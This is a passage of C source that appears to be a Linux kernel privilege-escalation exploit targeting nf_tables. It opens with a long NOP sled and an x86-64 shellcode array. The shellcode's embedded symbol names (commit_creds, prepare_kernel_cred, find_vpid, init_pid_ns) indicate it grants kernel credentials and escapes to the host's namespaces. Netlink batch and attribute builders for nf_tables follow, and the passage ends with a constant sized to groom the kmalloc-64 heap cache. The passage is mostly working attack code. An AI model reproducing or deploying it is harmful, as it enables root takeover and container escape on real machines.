0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,

0x48, 0x8d, 0x3d, 0x00, 0x10, 0x00, 0x00, 0xeb, 0x00, 0x55, 0x41, 0x57,
0x41, 0x56, 0x41, 0x54, 0x53, 0x49, 0x89, 0xfc, 0x48, 0x8d, 0x35, 0xfd,
0x01, 0x00, 0x00, 0x6a, 0x0d, 0x5a, 0xe8, 0x85, 0x01, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x0f, 0x84, 0x71, 0x01, 0x00, 0x00, 0x48, 0x89, 0xc3, 0x48,
0x8d, 0x35, 0xef, 0x01, 0x00, 0x00, 0x6a, 0x14, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0x67, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x53, 0x01,
0x00, 0x00, 0x48, 0x63, 0x2b, 0x48, 0x01, 0xdd, 0x48, 0x63, 0x08, 0x48,
0x01, 0xc1, 0x31, 0xff, 0xff, 0xd1, 0x48, 0x89, 0xc7, 0xff, 0xd5, 0x48,
0x8d, 0x35, 0xd3, 0x01, 0x00, 0x00, 0x6a, 0x0a, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0x37, 0x01, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x23, 0x01,
0x00, 0x00, 0x48, 0x89, 0xc3, 0x48, 0x8d, 0x35, 0xbf, 0x01, 0x00, 0x00,
0x6a, 0x09, 0x5a, 0x4c, 0x89, 0xe7, 0xe8, 0x19, 0x01, 0x00, 0x00, 0x48,
0x85, 0xc0, 0x0f, 0x84, 0x05, 0x01, 0x00, 0x00, 0x48, 0x63, 0x0b, 0x48,
0x01, 0xd9, 0x48, 0x63, 0x18, 0x48, 0x01, 0xc3, 0x6a, 0x01, 0x5f, 0xff,
0xd1, 0x48, 0x89, 0xc7, 0x31, 0xf6, 0xff, 0xd3, 0x49, 0x89, 0xc6, 0x48,
0x8d, 0x35, 0x92, 0x01, 0x00, 0x00, 0x6a, 0x0c, 0x5a, 0x4c, 0x89, 0xe7,
0xe8, 0xe3, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xcf, 0x00,
0x00, 0x00, 0x49, 0x89, 0xc7, 0x48, 0x63, 0x18, 0x48, 0x8d, 0x35, 0x7d,
0x01, 0x00, 0x00, 0x6a, 0x0c, 0x5a, 0x4c, 0x89, 0xe7, 0xe8, 0xc2, 0x00,
0x00, 0x00, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xae, 0x00, 0x00, 0x00, 0x49,
0x01, 0xdf, 0x49, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0,
0x4c, 0x63, 0x10, 0x49, 0x01, 0xc2, 0x49, 0x8d, 0x8f, 0xa0, 0x00, 0x00,
0x00, 0x4c, 0x89, 0xfa, 0x48, 0x39, 0xca, 0x0f, 0x83, 0x88, 0x00, 0x00,
0x00, 0x48, 0x8b, 0x02, 0x4c, 0x39, 0xc0, 0x73, 0x06, 0x48, 0x83, 0xc2,
0x08, 0xeb, 0xe9, 0x48, 0x8d, 0xb0, 0x00, 0x30, 0x00, 0x00, 0x48, 0x89,
0xc7, 0x48, 0x39, 0xf7, 0x73, 0xeb, 0x48, 0x39, 0x07, 0x48, 0x8d, 0x7f,
0x08, 0x75, 0xf2, 0x48, 0x85, 0xc0, 0x74, 0x5d, 0x6a, 0x01, 0x41, 0x5c,
0x49, 0x89, 0xc3, 0x49, 0x39, 0xf3, 0x73, 0x51, 0x4d, 0x8b, 0x0b, 0x4d,
0x39, 0xc1, 0x72, 0x34, 0x4c, 0x39, 0xc8, 0x74, 0x2f, 0x49, 0x8d, 0x49,
0x60, 0x31, 0xd2, 0x31, 0xdb, 0x4c, 0x89, 0xcf, 0x48, 0x39, 0xcf, 0x73,
0x1f, 0x48, 0x8b, 0x2f, 0x4c, 0x39, 0xfd, 0x41, 0x0f, 0x44, 0xd4, 0x4c,
0x39, 0xd5, 0x41, 0x0f, 0x44, 0xdc, 0x48, 0x83, 0xc7, 0x08, 0x85, 0xdb,
0x74, 0xe2, 0x85, 0xd2, 0x74, 0xde, 0xeb, 0x06, 0x49, 0x83, 0xc3, 0x08,
0xeb, 0xb9, 0x4d, 0x85, 0xc9, 0x74, 0x0a, 0x4c, 0x89, 0xc9, 0x48, 0x29,
0xc1, 0x4d, 0x89, 0x0c, 0x0e, 0x31, 0xc0, 0x5b, 0x41, 0x5c, 0x41, 0x5e,
0x41, 0x5f, 0x5d, 0xc3, 0x53, 0x49, 0x89, 0xd0, 0x49, 0xf7, 0xd8, 0x41,
0xb9, 0x00, 0x00, 0x00, 0x02, 0x31, 0xc0, 0x49, 0x89, 0xfb, 0x4e, 0x8d,
0x14, 0x07, 0x4d, 0x01, 0xca, 0x4d, 0x39, 0xd3, 0x77, 0x50, 0x31, 0xc9,
0x48, 0x39, 0xca, 0x74, 0x13, 0x41, 0x8a, 0x1c, 0x0b, 0x3a, 0x1c, 0x0e,
0x75, 0x05, 0x48, 0xff, 0xc1, 0xeb, 0xed, 0x49, 0xff, 0xc3, 0xeb, 0xe1,
0x4d, 0x85, 0xdb, 0x74, 0x31, 0x49, 0x01, 0xf9, 0x48, 0x83, 0xe7, 0xfc,
0x4c, 0x39, 0xcf, 0x73, 0x13, 0x8b, 0x0f, 0x4c, 0x89, 0xdb, 0x48, 0x29,
0xcb, 0x48, 0x39, 0xfb, 0x74, 0x11, 0x48, 0x83, 0xc7, 0x04, 0xeb, 0xe8,
0x49, 0x01, 0xd3, 0x4d, 0x29, 0xd9, 0x4c, 0x89, 0xdf, 0xeb, 0xab, 0x48,
0x83, 0xc7, 0xfc, 0x48, 0x89, 0xf8, 0x5b, 0xc3, 0x63, 0x6f, 0x6d, 0x6d,
0x69, 0x74, 0x5f, 0x63, 0x72, 0x65, 0x64, 0x73, 0x00, 0x70, 0x72, 0x65,
0x70, 0x61, 0x72, 0x65, 0x5f, 0x6b, 0x65, 0x72, 0x6e, 0x65, 0x6c, 0x5f,
0x63, 0x72, 0x65, 0x64, 0x00, 0x66, 0x69, 0x6e, 0x64, 0x5f, 0x76, 0x70,
0x69, 0x64, 0x00, 0x70, 0x69, 0x64, 0x5f, 0x74, 0x61, 0x73, 0x6b, 0x00,
0x69, 0x6e, 0x69, 0x74, 0x5f, 0x70, 0x69, 0x64, 0x5f, 0x6e, 0x73, 0x00,
0x69, 0x6e, 0x69, 0x74, 0x5f, 0x75, 0x74, 0x73, 0x5f, 0x6e, 0x73, 0x00};

// ---------------------------------- netlink --------------------------------------
// Netlink messages
// Receive buffer size, in bytes
#define NETLINK_RECEIVE_BUFFER_SIZE 4096

// Netlink attributes
// Total (unpadded) size of an attribute: header + payload
#define U32_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint32_t))
#define U64_NLA_SIZE (sizeof(struct nlattr) + sizeof(uint64_t))
#define S8_NLA_SIZE (sizeof(struct nlattr) + 8)
// Macro arguments are parenthesised so that compound expressions
// (e.g. `cond ? a : b`, `p + 1`) expand with the intended precedence.
#define NLA_BIN_SIZE(x) (sizeof(struct nlattr) + (x))
// Address of the payload that follows the attribute header
// (relies on the GNU C extension allowing arithmetic on `void *`)
#define NLA_ATTR(attr) ((void *)(attr) + NLA_HDRLEN)
// Space for a netlink message carrying a struct nfgenmsg plus one 8-byte string attribute
#define TABLEMSG_SIZE NLMSG_SPACE(sizeof(struct nfgenmsg) + S8_NLA_SIZE)

// get_batch_begin_nlmsg(): Construct a BATCH_BEGIN message for the netfilter netlink
// Returns a freshly malloc()'d, zero-filled message of
// NLMSG_SPACE(sizeof(struct nfgenmsg)) bytes; nothing here frees it, so the
// caller is responsible for releasing it. Calls err_exit("malloc") when the
// allocation fails (err_exit is presumably non-returning — confirm).
struct nlmsghdr *get_batch_begin_nlmsg(void) {
    const size_t msg_size = NLMSG_SPACE(sizeof(struct nfgenmsg));
    struct nlmsghdr *nlh = (struct nlmsghdr *)malloc(msg_size);
    struct nfgenmsg *nfgm;

    if (!nlh)
        err_exit("malloc");

    // Derive the payload pointer only after the allocation has been validated,
    // so no pointer arithmetic is ever performed on NULL.
    nfgm = (struct nfgenmsg *)NLMSG_DATA(nlh);

    memset(nlh, 0, msg_size);
    nlh->nlmsg_len = msg_size;
    nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN;
    nlh->nlmsg_pid = getpid();
    nlh->nlmsg_flags = 0;
    nlh->nlmsg_seq = 0;

    // Selects the netfilter tables subsystem. res_id is a big-endian 16-bit
    // field, so it is converted to network byte order like the other values
    // this file puts on the wire.
    nfgm->res_id = htons(NFNL_SUBSYS_NFTABLES);

    return nlh;
}

// get_batch_end_nlmsg(): Build the BATCH_END message that terminates a netfilter netlink batch
// Returns a malloc()'d, zero-filled message of NLMSG_SPACE(sizeof(struct nfgenmsg))
// bytes with NLM_F_REQUEST set; calls err_exit("malloc") if the allocation fails.
struct nlmsghdr *get_batch_end_nlmsg(void) {
    const size_t total_len = NLMSG_SPACE(sizeof(struct nfgenmsg));
    struct nlmsghdr *msg = (struct nlmsghdr *)malloc(total_len);

    if (msg == NULL)
        err_exit("malloc");

    // Start from an all-zero message, then fill in the header fields
    memset(msg, 0, total_len);
    msg->nlmsg_len = total_len;
    msg->nlmsg_type = NFNL_MSG_BATCH_END;
    msg->nlmsg_pid = getpid();
    msg->nlmsg_flags = NLM_F_REQUEST;
    msg->nlmsg_seq = 0;

    return msg;
}

// set_nested_attr(): Write the header of a nested netlink attribute
// @attr: Location where the attribute header is written
// @type: Value stored in nla_type
// @data_len: Length of the nested payload; nla_len becomes the aligned header + payload size
// Returns the address immediately after the header, where the nested content goes.
struct nlattr *set_nested_attr(struct nlattr *attr, uint16_t type, uint16_t data_len) {
    const size_t header_size = sizeof(struct nlattr);

    attr->nla_len = NLA_ALIGN(data_len + header_size);
    attr->nla_type = type;

    return (struct nlattr *)((char *)attr + header_size);
}

// set_u32_attr(): Write a 32-bit integer netlink attribute
// @attr: Location where the attribute is written
// @type: Value stored in nla_type
// @value: Host-order integer; stored after conversion with htonl()
// Returns the address U32_NLA_SIZE bytes past @attr, i.e. where the next attribute starts.
struct nlattr *set_u32_attr(struct nlattr *attr, uint16_t type, uint32_t value) {
    uint32_t *payload = (uint32_t *)NLA_ATTR(attr);

    attr->nla_len = U32_NLA_SIZE;
    attr->nla_type = type;
    *payload = htonl(value);

    return (struct nlattr *)((char *)attr + U32_NLA_SIZE);
}

// set_u64_attr(): Write a 64-bit integer netlink attribute
// @attr: Location where the attribute is written
// @type: Value stored in nla_type
// @value: Host-order integer; stored after conversion with htobe64()
// Returns the address U64_NLA_SIZE bytes past @attr, i.e. where the next attribute starts.
struct nlattr *set_u64_attr(struct nlattr *attr, uint16_t type, uint64_t value) {
    uint64_t *payload = (uint64_t *)NLA_ATTR(attr);

    attr->nla_len = U64_NLA_SIZE;
    attr->nla_type = type;
    *payload = htobe64(value);

    return (struct nlattr *)((char *)attr + U64_NLA_SIZE);
}

// set_str8_attr(): Write a netlink attribute carrying an 8-byte string
// @attr: Location where the attribute is written
// @type: Value stored in nla_type
// @name: Source buffer; exactly 8 bytes are copied, no terminator is added
// Returns the address S8_NLA_SIZE bytes past @attr, i.e. where the next attribute starts.
struct nlattr *set_str8_attr(struct nlattr *attr, uint16_t type, const char name[8]) {
    void *payload = NLA_ATTR(attr);

    attr->nla_len = S8_NLA_SIZE;
    attr->nla_type = type;
    memcpy(payload, name, 8);

    return (struct nlattr *)((char *)attr + S8_NLA_SIZE);
}

// set_binary_attr(): Write a netlink attribute carrying an arbitrary byte array
// @attr: Location where the attribute is written
// @type: Value stored in nla_type
// @buffer: Data copied into the attribute payload
// @buffer_size: Number of bytes copied from @buffer
// nla_len records the unpadded size (header + payload); the returned address is
// rounded up with NLA_ALIGN so the next attribute starts on an aligned boundary.
// NOTE(review): buffer_size is not range-checked here — callers must keep it
// small enough for the attribute length field.
struct nlattr *set_binary_attr(struct nlattr *attr, uint16_t type, uint8_t *buffer, uint64_t buffer_size) {
    const uint64_t attr_len = NLA_BIN_SIZE(buffer_size);

    attr->nla_len = attr_len;
    attr->nla_type = type;
    memcpy(NLA_ATTR(attr), buffer, buffer_size);

    return (struct nlattr *)((char *)attr + NLA_ALIGN(attr_len));
}

// ---------------------------------- nf_tables --------------------------------------
// Key length constant: 64 - 8 - 12 - 16 = 28 bytes.
// NOTE(review): judging by the name and the note below, presumably sized so the
// resulting allocation lands in a 64-byte kmalloc cache — confirm against the users.
#define KMALLOC64_KEYLEN (64 - 8 - 12 - 16) // Max size - elemsize - sizeof(nft_set_ext)(align) - min datasize

// Read-only buffer of 0x40 (64) zero bytes
const uint8_t zerobuf[0x40] = {0};